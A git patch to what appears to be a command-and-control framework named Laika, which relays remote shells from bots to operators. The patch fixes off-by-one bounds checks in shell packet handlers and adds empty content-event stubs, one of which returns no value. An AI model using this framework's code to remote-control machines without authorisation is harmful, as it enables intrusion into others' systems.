From 0fc8d0c1690860abaed95451c0bc988d1dc39e1c Mon Sep 17 00:00:00 2001 From: CPunch Date: Mon, 13 Jun 2022 12:11:08 -0500 Subject: [PATCH] CNC: Fix possible out of bounds subscript for SHELL_* packets - content events now pass the sLaika_peer struct --- cnc/include/cpeer.h | 7 +++++++ cnc/src/cpanel.c | 6 +++--- cnc/src/cpeer.c | 23 ++++++++++++++++++++--- lib/include/lcontent.h | 7 ++++--- lib/src/lcontent.c | 10 +++++++--- 5 files changed, 41 insertions(+), 12 deletions(-) diff --git a/cnc/include/cpeer.h b/cnc/include/cpeer.h index ee7ff74..5ca80f6 100644 --- a/cnc/include/cpeer.h +++ b/cnc/include/cpeer.h @@ -52,4 +52,11 @@ void laikaC_handlePing(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData); void laikaC_handleShellClose(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData); void laikaC_handleShellData(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData); +/* content stream has finished */ +void laikaC_contentRecvEvent(struct sLaika_peer *peer, struct sLaika_contentContext *context, struct sLaika_content *content); +/* request to open a content stream */ +bool laikaC_contentNewEvent(struct sLaika_peer *peer, struct sLaika_contentContext *context, struct sLaika_content *content); +/* error happened on a stream */ +void laikaC_contentErrEvent(struct sLaika_peer *peer, struct sLaika_contentContext *context, struct sLaika_content *content, CONTENT_ERRCODE err); + #endif \ No newline at end of file diff --git a/cnc/src/cpanel.c b/cnc/src/cpanel.c index e061654..e0fbf98 100644 --- a/cnc/src/cpanel.c +++ b/cnc/src/cpanel.c @@ -41,7 +41,7 @@ void laikaC_sendRmvPeer(struct sLaika_peer *authPeer, struct sLaika_peer *peer) laikaS_endOutPacket(authPeer); } -/* ============================================[[ Packet Handlers ]]============================================= */ +/* =========================================[[ [Auth] Packet Handlers ]]========================================= */ void laikaC_handleAuthenticatedHandshake(struct sLaika_peer *authPeer, LAIKAPKT_SIZE sz, void *uData) { struct sLaika_peerInfo *pInfo = (struct sLaika_peerInfo*)uData; @@ -100,7 +100,7 @@ void laikaC_handleAuthenticatedShellClose(struct sLaika_peer *authPeer, LAIKAPKT laikaS_readInt(&authPeer->sock, &id, sizeof(uint32_t)); /* ignore malformed packet */ - if (id > LAIKA_MAX_SHELLS || (shell = pInfo->shells[id]) == NULL) + if (id >= LAIKA_MAX_SHELLS || (shell = pInfo->shells[id]) == NULL) return; laikaC_closeShell(shell); @@ -121,7 +121,7 @@ void laikaC_handleAuthenticatedShellData(struct sLaika_peer *authPeer, LAIKAPKT_ sz -= sizeof(uint32_t); /* ignore malformed packet */ - if (id > LAIKA_MAX_SHELLS || (shell = pInfo->shells[id]) == NULL) + if (id >= LAIKA_MAX_SHELLS || (shell = pInfo->shells[id]) == NULL) return; peer = shell->bot; diff --git a/cnc/src/cpeer.c b/cnc/src/cpeer.c index 69f75af..cf36f98 100644 --- a/cnc/src/cpeer.c +++ b/cnc/src/cpeer.c @@ -116,7 +116,7 @@ void laikaC_closeShells(struct sLaika_peer *peer) { } } -/* ============================================[[ Packet Handlers ]]============================================= */ +/* ========================================[[ [Peer] Packet Handlers ]]========================================== */ void laikaC_handleShellClose(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData) { struct sLaika_peerInfo *pInfo = (struct sLaika_peerInfo*)uData; @@ -126,7 +126,7 @@ void laikaC_handleShellClose(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *u laikaS_readInt(&peer->sock, &id, sizeof(uint32_t)); /* ignore packet if shell isn't open */ - if (id > LAIKA_MAX_SHELLS || (shell = pInfo->shells[id]) == NULL) + if (id >= LAIKA_MAX_SHELLS || (shell = pInfo->shells[id]) == NULL) return; /* close shell */ @@ -146,7 +146,7 @@ void laikaC_handleShellData(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uD laikaS_readInt(&peer->sock, &id, sizeof(uint32_t)); /* ignore packet if shell isn't open */ - if (id > LAIKA_MAX_SHELLS || (shell = pInfo->shells[id]) == NULL) + if (id >= LAIKA_MAX_SHELLS || (shell = pInfo->shells[id]) == NULL) return; laikaS_read(&peer->sock, (void*)buf, sz-sizeof(uint32_t)); @@ -157,3 +157,20 @@ void laikaC_handleShellData(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uD laikaS_write(&shell->auth->sock, buf, sz-sizeof(uint32_t)); laikaS_endVarPacket(shell->auth); } + +/* ============================================[[ Content Handlers ]]============================================ */ + +/* content stream has finished */ +void laikaC_contentRecvEvent(struct sLaika_peer *peer, struct sLaika_contentContext *context, struct sLaika_content *content) { + +} + +/* request to open a content stream */ +bool laikaC_contentNewEvent(struct sLaika_peer *peer, struct sLaika_contentContext *context, struct sLaika_content *content) { + +} + +/* error happened on a stream */ +void laikaC_contentErrEvent(struct sLaika_peer *peer, struct sLaika_contentContext *context, struct sLaika_content *content, CONTENT_ERRCODE err) { + +} \ No newline at end of file diff --git a/lib/include/lcontent.h b/lib/include/lcontent.h index 5997707..9ed81fa 100644 --- a/lib/include/lcontent.h +++ b/lib/include/lcontent.h @@ -26,9 +26,9 @@ typedef uint8_t CONTENT_TYPE; typedef uint8_t CONTENT_ERRCODE; typedef uint16_t CONTENT_ID; -typedef void (*contentRecvEvent)(struct sLaika_contentContext *context, struct sLaika_content *content); -typedef bool (*contentNewEvent)(struct sLaika_contentContext *context, struct sLaika_content *content); -typedef void (*contentErrorEvent)(struct sLaika_contentContext *context, struct sLaika_content *content, CONTENT_ERRCODE err); +typedef void (*contentRecvEvent)(struct sLaika_peer *peer, struct sLaika_contentContext *context, struct sLaika_content *content); +typedef bool (*contentNewEvent)(struct sLaika_peer *peer, struct sLaika_contentContext *context, struct sLaika_content *content); +typedef void (*contentErrorEvent)(struct sLaika_peer *peer, struct sLaika_contentContext *context, struct sLaika_content *content, CONTENT_ERRCODE err); struct sLaika_content { struct sLaika_content *next; @@ -53,6 +53,7 @@ void laikaF_cleanContext(struct sLaika_contentContext *context); void laikaF_setupEvents(struct sLaika_contentContext *context, contentRecvEvent onRecv, contentNewEvent onNew, contentErrorEvent onError); +int laikaF_nextID(struct sLaika_peer *peer); /* returns the id that will be assigned to the next sent content */ int laikaF_sendContent(struct sLaika_peer *peer, FILE *fd, CONTENT_TYPE type); void laikaF_pollContent(struct sLaika_peer *peer); diff --git a/lib/src/lcontent.c b/lib/src/lcontent.c index ddbf19a..e7f6c22 100644 --- a/lib/src/lcontent.c +++ b/lib/src/lcontent.c @@ -110,6 +110,10 @@ struct sLaika_content* laikaF_newContent(struct sLaika_contentContext *context, return content; } +int laikaF_nextID(struct sLaika_peer *peer) { + return peer->context.nextID + 1; +} + int laikaF_sendContent(struct sLaika_peer *peer, FILE *fd, CONTENT_TYPE type) { struct sLaika_contentContext *context = &peer->context; struct sLaika_content *content = laikaF_newContent(context, fd, getSize(fd), context->nextID++, type, CONTENT_OUT); @@ -180,7 +184,7 @@ void laikaF_handleContentNew(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *u contentType = laikaS_readByte(&peer->sock); content = laikaF_recvContent(peer, contentID, contentSize, contentType); - if (context->onNew && !context->onNew(context, content)) { + if (context->onNew && !context->onNew(peer, context, content)) { sendContentError(peer, contentID, CONTENT_ERR_REJECTED); rmvContent(context, content); } @@ -200,7 +204,7 @@ void laikaF_handleContentError(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void LAIKA_DEBUG("We received an errcode for id %d, err: %d\n", contentID, errCode); if (context->onError) /* check if event exists! */ - context->onError(context, content, errCode); + context->onError(peer, context, content, errCode); rmvContent(context, content); } @@ -226,6 +230,6 @@ void laikaF_handleContentChunk(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void rmvContent(context, content); } else if ((content->processed += bodySz) == content->sz) { if (context->onReceived) /* check if event exists! */ - context->onReceived(context, content); + context->onReceived(peer, context, content); } }